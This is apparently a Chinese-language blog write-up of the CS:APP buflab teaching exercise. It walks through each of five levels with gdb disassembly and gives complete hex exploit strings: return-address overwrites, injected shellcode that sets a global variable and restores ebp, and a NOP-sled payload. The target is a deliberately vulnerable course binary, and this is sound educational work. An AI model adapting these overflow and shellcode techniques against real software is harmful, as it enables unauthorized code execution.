CSAPP-buflab

选项	参数
系统环境	Windows10 系统下 VMware 虚拟机 Ubuntu12.04 桌面版 32 位
原址链接	http://csapp.cs.cmu.edu/3e/labs.html
`userid`	`Wilfred`
`cookie`	`0x23a81b97`

level0 Candle

首先进入 gdb调试，观察到调用路径为：

graph LR;
main(main) --> launcher(launcher);
launcher --> launch(launch);
launch --> test(test);
test --> getbuf(getbuf);
getbuf --> Gets(Gets);

其中 Gets 用于读取字符串，getbuf 分配存储空间并调用 Gets 读取字符串，所以攻击的目标为 getbuf 函数。

查看 getbuf 的反汇编代码

08049262 <getbuf>:
 8049262:   55                      push   %ebp
 8049263:   89 e5                   mov    %esp,%ebp
 8049265:   83 ec 38                sub    $0x38,%esp
 8049268:   8d 45 d8                lea    -0x28(%ebp),%eax
 804926b:   89 04 24                mov    %eax,(%esp)
 804926e:   e8 bf f9 ff ff          call   8048c32 <Gets>
 8049273:   b8 01 00 00 00          mov    $0x1,%eax
 8049278:   c9                      leave  
 8049279:   c3                      ret

确定 buffer 的首地址为 -0x28(%ebp)，而返回地址存放在 0x4(%ebp)，两者间隔 44 个字节，同时返回地址占 4 个字节的空间，所以至少需要 48 个字节长度的字符。

构造如下字符串（使用二进制码表示，特殊字符无法显示）：

0/* spaces 44 Bytes */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00

/* return address to smoke 4 Bytes */
0b 8e 04 08

主义如果系统是小端法存储，则多字节数据要倒着写（博主虚拟机是小端法，所以这里返回地址倒着写）。

尝试运行，成功调用：

level1 Sparkler

该题与 level0 类似，不过调用的是 fizz 函数，观察反汇编代码：

; fizz(int var1)
08048daf <fizz>:
 8048daf:   55                      push   %ebp
 8048db0:   89 e5                   mov    %esp,%ebp
 8048db2:   83 ec 18                sub    $0x18,%esp
 ; if (var1 == cookie)
 8048db5:   8b 45 08                mov    0x8(%ebp),%eax
 8048db8:   3b 05 04 d1 04 08       cmp    0x804d104,%eax
 8048dbe:   75 26                   jne    8048de6 <fizz+0x37>
 ;   __printf_chk(1, "Fizz!: You called fizz(0x%x)", var1)
 8048dc0:   89 44 24 08             mov    %eax,0x8(%esp)
 8048dc4:   c7 44 24 04 e0 a2 04    movl   $0x804a2e0,0x4(%esp)
 8048dcb:   08 
 8048dcc:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 8048dd3:   e8 b8 fb ff ff          call   8048990 <__printf_chk@plt>
 8048dd8:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 8048ddf:   e8 9c 04 00 00          call   8049280 <validate>
 8048de4:   eb 18                   jmp    8048dfe <fizz+0x4f>
 ; else
 ;   __printf_chk(1, "Misfire: You called fizz(0x%x)\n", var1)
 8048de6:   89 44 24 08             mov    %eax,0x8(%esp)
 8048dea:   c7 44 24 04 d4 a4 04    movl   $0x804a4d4,0x4(%esp)
 8048df1:   08 
 8048df2:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 8048df9:   e8 92 fb ff ff          call   8048990 <__printf_chk@plt>
 ; end if
 ; exit(0)
 8048dfe:   c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 8048e05:   e8 c6 fa ff ff          call   80488d0 <exit@plt>

发现 fizz 函数传入了一个参数，并且要求与 cookie 相同。

如果了解栈帧，就知道第一个参数的位置为 0x8(%ebp)，构造如下字符串：

/* spaces 44 Bytes */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00

/* return address to fizz 4 Bytes */
af 8d 04 08

/* spaces 4 Bytes */
00 00 00 00

/* cookie 4 Bytes */
97 1b a8 23

切记，由于进入 fizz 是通过 return，ebp 的值会加 4，所以 fizz 的 0x8(%ebp) 对应 getbuf 的0xc(%ebp)，需要填充被跳过的 4 个字节。

尝试运行，成功通过：

level2 Firecracker

该题需要调用 bang 函数，观察反汇编代码：

08048d52 <bang>:
 8048d52:   55                      push   %ebp
 8048d53:   89 e5                   mov    %esp,%ebp
 8048d55:   83 ec 18                sub    $0x18,%esp
 ; if (global_value == cookie)
 8048d58:   a1 0c d1 04 08          mov    0x804d10c,%eax
 8048d5d:   3b 05 04 d1 04 08       cmp    0x804d104,%eax
 8048d63:   75 26                   jne    8048d8b <bang+0x39>
 ;   true
 ;   __printf_chk(1, "Bang!: You set global_value to 0x%x\n", global_value)
 8048d65:   89 44 24 08             mov    %eax,0x8(%esp)
 8048d69:   c7 44 24 04 ac a4 04    movl   $0x804a4ac,0x4(%esp)
 8048d70:   08 
 8048d71:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 8048d78:   e8 13 fc ff ff          call   8048990 <__printf_chk@plt>
 ;   validate(2)
 8048d7d:   c7 04 24 02 00 00 00    movl   $0x2,(%esp)
 8048d84:   e8 f7 04 00 00          call   8049280 <validate>
 8048d89:   eb 18                   jmp    8048da3 <bang+0x51>
 ;   false
 ;   __printf_chk(1, "Misfire: global_value = 0x%x\n", global_value)
 8048d8b:   89 44 24 08             mov    %eax,0x8(%esp)
 8048d8f:   c7 44 24 04 c2 a2 04    movl   $0x804a2c2,0x4(%esp)
 8048d96:   08 
 8048d97:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 8048d9e:   e8 ed fb ff ff          call   8048990 <__printf_chk@plt>
 ; end if
 8048da3:   c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 8048daa:   e8 21 fb ff ff          call   80488d0 <exit@plt>

发现代码中判断了全局变量的值是否为 cookie，而全局变量不存在于栈中，无法通过缓冲区溢出来覆写它的值，只能通过注入代码来实现。所以需要在字符串中构造一个函数，先通过 getbuf 函数返回至构造的代码，在构造的代码中返回至 bang 函数。

首先设计汇编代码：

mov $0x23a81b97,%eax
mov $0x0804d10c,%ecx
mov %eax,(%ecx)
ret

将 cookie 存入 eax 寄存器，再将全局变量的地址存入 ecx 寄存器，通过间接寻址来更改其值然后返回。

使用 as 命令编译成 .o 文件然后使用 objdump 命令获得相应的二进制编码，之后构造字符串：

/* my function 13 Bytes */
b8 97 1b a8 23 /* mov $0x23a81b97,%eax */
b9 0c d1 04 08 /* mov $0x0804d10c,%ecx */
89 01          /* mov %eax,(%ecx) */
c3             /* ret */

/* spaces 31 Bytes */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00

/* return address to my function 4 Bytes */
58 2f 68 55

/* return address to bang 4 Bytes */
52 8d 04 08

运行程序，成功通过：

level3 Dynamite

本题不再要求返回至其他的函数，而是要求返回至应当返回的地方（test中的下一条指令），但是要求返回至更改为 cookie，依旧需要注入代码来实现。同时 test 中对栈帧进行了检查，所以在返回至 test 时需要还原 ebp 寄存器的值。

在 gdb 中找到需要还原的值：

设计如下汇编代码：

push $0x08048e50        # set return address
push $0x55682fb0        # restore ebp
mov $0x23a81b97,%eax    # return value (cookie)
leave
ret

由于 PUSH 指令存放的地址取决于 ebp，所以在设计字符串时不能将存放 ebp 的空间覆写为其他值：

/* my function 17 Bytes */
68 50 8e 04 08 /* push $0x8048e50 */
68 b0 2f 68 55 /* push $0x55682fb0 */
b8 97 1b a8 23 /* mov $0x23a81b97,%eax */
c9             /* leave */
c3             /* ret */

/* spaces 23 Bytes */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00

/* set ebp 4 Bytes */
80 2f 68 55

/* return address to my function 4 Bytes */
58 2f 68 55

还原 ebp 的方法还有另外一种，见 level4。

运行程序，成功通过：

level4 Nitroglycerin

本题与 level3 类似，区别在于会执行 5 次，而且每次调用的栈帧位置都会发生变化，同时要求只使用一份字符串来实现功能。

本题的调用路径发生了一些变化：

graph LR;
main(main) --> launcher(launcher);
launcher --> launch(launch);
launch --> testn(testn);
testn --> getbufn(getbufn);
getbufn --> Gets(Gets);

其中 buffer 的空间扩大成了 512 个字节，比原先多了 480 个字节。

由于只能使用一份字符串，所以每次返回至的位置是相同的，但是每次栈帧位置都会发生变化，所以我们要保证返回至的位置应当是无效代码，同时它应当在我们需要执行的代码的前面（更小的地址）。

由于栈帧不固定，所以 ebp 并非确定的，需要通过 esp 来确定其值，首先观察 testn 的反汇编代码：

08048cce <testn>:
 8048cce:   55                      push   %ebp
 8048ccf:   89 e5                   mov    %esp,%ebp
 8048cd1:   53                      push   %ebx
 8048cd2:   83 ec 24                sub    $0x24,%esp

在 MOV 指令执行完毕时 esp 与 ebp 的值相等，之后执行了一次 PUSH（esp值减 4），再执行 SUB 指令，所以 ebp = esp+0x28。

设计如下代码：

lea 0x28(%esp),%ebp     # restore ebp
push $0x08048ce2        # set return address
mov $0x23a81b97,%eax    # return value (cookie)
ret

接下来需要确定跳转的地方，即 getbuf 的返回地址。虽然 5 次调用的栈帧地址不同，但是多次执行程序，每次都是相同的，所以可以确定跳转的范围：

次数	`ebp` 的值	`buffer` 的首地址
1	`0x55682f80`	`0x55682d78`
2	`0x55682f50`	`0x55682d48`
3	`0x55682f60`	`0x55682d58`
4	`0x55682f00`	`0x55682cf8`
5	`0x55682f40`	`0x55682d38`

跳转的安全范围应当是 buffer ~ ebp，而 buffer 最大为 0x55682d78，所以选择跳转至 0x55682d78 一定能落在恶意数据的范围内。

接下来确定填充的数据，它应当满足以下两个条件：

本身不会影响到程序的功能
指令长度应当为 1 个字节，以免跳转至一条指令的中间部分导致错误

恰好 NOP 指令满足以上条件，其值为 0x90。

设计如下字符串：

/* nop sleds 505 Bytes */
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90

/* my function 15 Bytes */
8d 6c 24 28    /* lea 0x28(%esp),%ebp */
68 e2 8c 04 08 /* push $0x8048ce2 */
b8 97 1b a8 23 /* mov $0x23a81b97,%eax */
c3             /* ret  */

/* set ebp 4 Bytes */
00 00 00 00

/* set return address 4 Bytes */
78 2d 68 55

运行程序，成功通过：

至此，buflab 全部完成！

个人博客：https://wilfredshen.cn/